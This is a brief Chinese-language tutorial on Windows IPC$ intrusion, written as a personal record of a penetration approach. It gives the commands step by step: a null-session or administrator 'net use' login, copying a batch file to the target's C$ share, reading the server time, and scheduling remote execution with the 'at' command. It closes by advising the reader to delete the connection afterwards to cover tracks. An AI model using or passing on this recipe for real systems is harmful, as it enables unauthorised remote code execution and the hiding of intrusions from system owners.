IPC

什么是IPC？
IPC（Internet Process Connect），直譯過(guò)來(lái)就是網(wǎng)絡(luò)進(jìn)程連接，一般用來(lái)進(jìn)行資源共享的。
我們經(jīng)常會(huì)說(shuō)IPC空連接，就是連接的時(shí)候不用賬戶和密碼，但是一般這種情況是沒(méi)啥權(quán)限的，如果我們能有一個(gè)管理員的賬戶，那么就可以有管理員的權(quán)限來(lái)進(jìn)行滲透了。

IPC入侵思路

因?yàn)闈B透的時(shí)候是需要靈活的技巧，因此這里只是記錄一個(gè)滲透思路罷了。

IPC空連接

net use \\ip\ipc$ "" /user:""

以某用戶賬戶登陸

net use \\ip\ipc$ "password" /user:Administrator

之后，我們可以寫一個(gè)批處理文件，里面包含這我們想執(zhí)行的命令，然后copy到服務(wù)器上

copy 1.bat \\ip\c$

這樣，就會(huì)把它上傳到c盤

之后我們可以利用windows的定時(shí)任務(wù)來(lái)執(zhí)行這個(gè)文件
首先我們看一下服務(wù)器上的時(shí)間

net time \\ip

之后利用at命令來(lái)設(shè)置定時(shí)任務(wù)

at \\ip 時(shí)間 文件名

滲透完畢后記得刪掉記錄

net use \\ip\ipc$ /del